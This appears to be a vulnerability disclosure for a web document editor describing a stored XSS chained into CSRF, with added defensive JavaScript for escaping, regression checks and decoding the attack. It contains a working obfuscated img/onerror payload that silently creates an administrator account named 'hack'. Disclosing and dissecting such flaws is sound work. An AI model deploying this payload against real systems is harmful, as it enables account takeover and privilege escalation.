Description
Hello, I found two vulnerabilities: a stored XSS and a CSRF.
An attacker can exploit the stored XSS to execute malicious JavaScript on a document page and act with the identity of any user who opens that document (ordinary users or administrators).
XSS
The document editor neither filters stored content nor blocks script execution when rendering it, so HTML and JavaScript saved inside a document are executed by the viewer's browser, resulting in stored XSS. Any user who opens a document containing the malicious code triggers the vulnerability in their own browser, with their own session.
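As an added illustration (not code from this report or from the affected editor), the following JavaScript contrasts the vulnerable pattern, inserting stored document content into the page as raw markup, with entity-encoding it first. The sample content and the helper names are constructed for this example. Note that the payload uses an img element with an onerror handler, so blocking only script tags is not filtering; anything that lets the browser create an element with an event-handler attribute is enough. An editor that legitimately stores rich HTML cannot use plain encoding and needs a server-side allowlist sanitizer instead; encoding is the right treatment wherever document content is rendered as text.

```javascript
// Added example; not the reporter's or the project's code.
// Constructed sample of attacker-controlled content stored in a document.
const STORED_DOCUMENT = "<img src=# onerror='alert(document.cookie)'>";

// Entity-encode the characters that can break out of an HTML text or
// attribute context. After this, the browser shows the payload as
// literal text and never creates an element or a handler.
function escapeHtml(untrusted) {
  const map = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;",
    '"': "&quot;", "'": "&#39;", "/": "&#x2F;",
  };
  return String(untrusted).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Vulnerable pattern: the template concatenates stored content into
// markup, so the browser parses the <img> tag and fires onerror.
function renderVulnerable(content) {
  return `<div class="doc">${content}</div>`;
}

// Hardened pattern: encode before concatenation.
function renderEscaped(content) {
  return `<div class="doc">${escapeHtml(content)}</div>`;
}

// Cheap regression check usable in a test suite: does the rendered
// output still contain an element carrying an on* event handler?
function containsEventHandler(html) {
  return /<[^>]*\son[a-z]+\s*=/i.test(html);
}

console.log("vulnerable:", renderVulnerable(STORED_DOCUMENT));
console.log("escaped:   ", renderEscaped(STORED_DOCUMENT));
console.log("handler survives (vulnerable):", containsEventHandler(renderVulnerable(STORED_DOCUMENT)));
console.log("handler survives (escaped):   ", containsEventHandler(renderEscaped(STORED_DOCUMENT)));
```

The check in containsEventHandler is deliberately crude (it is a test oracle, not a sanitizer); the protection comes from escapeHtml being applied on every output path, not from detecting handlers.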
CSRF
Using the XSS vulnerability from the previous step, an attacker can hijack the identity of other users: the injected script runs in the victim's browser and issues authenticated requests in the victim's name. The payload below sends only the fields of the user-creation form to /system/user/save; no anti-forgery token is included, and because the request originates from the application's own origin, such a token alone would not stop a script that can first read it from the page. I recorded a GIF to demonstrate a normal user hijacking the super administrator's identity to create a new administrator account.
Payload
<img src=# onerror='eval(decodeURI("var%20a%20=%20window.XMLHttpRequest%20?%20new%20XMLHttpRequest()%20:%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22);a.open(%22POST%22,%22/system/user/save%22,false);a.setRequestHeader(%22Content-type%22,%22application/x-www-form-urlencoded%22);a.send(%22username=hack&given_name=hack&password=hack&email=1%25401.cn&mobile=18888888888&role_id=1&phone=&department=&position=&location=&im=%22);"))'>
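The payload is obfuscated with decodeURI and executed through eval, which hides what it actually does. The JavaScript below is an added example (not the reporter's or the project's code) that reproduces the decode step without eval and pulls out the forged request, so the effect can be inspected and checked in a test. The helper names and the list of token field names are my assumptions. One detail worth seeing: the e-mail is written as 1%25401.cn because decodeURI leaves %40 untouched (@ is a reserved character) but does turn %25 into %, so after the first decode the body carries 1%401.cn, which the server's form decoder then reads as 1@1.cn.

```javascript
// Added example; not the reporter's or the project's code.
// The payload exactly as it appears in the report above.
const PAYLOAD = `<img src=# onerror='eval(decodeURI("var%20a%20=%20window.XMLHttpRequest%20?%20new%20XMLHttpRequest()%20:%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22);a.open(%22POST%22,%22/system/user/save%22,false);a.setRequestHeader(%22Content-type%22,%22application/x-www-form-urlencoded%22);a.send(%22username=hack&given_name=hack&password=hack&email=1%25401.cn&mobile=18888888888&role_id=1&phone=&department=&position=&location=&im=%22);"))'>`;

// Stage 1: the victim's browser evaluates decodeURI(...) on the
// percent-encoded string. Reproduce that step without eval to obtain the
// real script.
function decodeStage(payload) {
  const m = /decodeURI\("([^"]*)"\)/.exec(payload);
  if (!m) throw new Error("no decodeURI(...) stage found in payload");
  return decodeURI(m[1]);
}

// Stage 2: pull method, URL and body out of the XMLHttpRequest calls and
// parse the form-encoded body the way the server will (this is where
// %40 becomes @).
function extractForgedRequest(script) {
  const open = /\.open\("([A-Z]+)",\s*"([^"]*)"/.exec(script);
  const send = /\.send\("([^"]*)"\)/.exec(script);
  if (!open || !send) throw new Error("script is not an XMLHttpRequest payload");
  return {
    method: open[1],
    url: open[2],
    fields: Object.fromEntries(new URLSearchParams(send[1])),
  };
}

// The request is sent by the victim's own browser, so the session cookie
// is attached automatically; the only thing that could distinguish it
// from a legitimate submission is an unpredictable per-session token.
// Field names here are assumed common conventions, not the project's.
const TOKEN_FIELDS = ["_csrf", "csrf_token", "_token", "csrfmiddlewaretoken"];
function carriesAntiForgeryToken(fields) {
  return TOKEN_FIELDS.some((name) => name in fields);
}

function dissect(payload) {
  const req = extractForgedRequest(decodeStage(payload));
  return { ...req, hasToken: carriesAntiForgeryToken(req.fields) };
}

console.log(dissect(PAYLOAD));
```

The dissection shows a synchronous POST (the third argument to open is false) that creates a user named hack with role_id=1, the role the report says yields an administrator account, and no token field. Adding a token would raise the bar only against classic cross-site forgery; a script that already runs in the page's origin can fetch a form and read the token before posting, so the fix that actually closes this chain is the stored XSS itself.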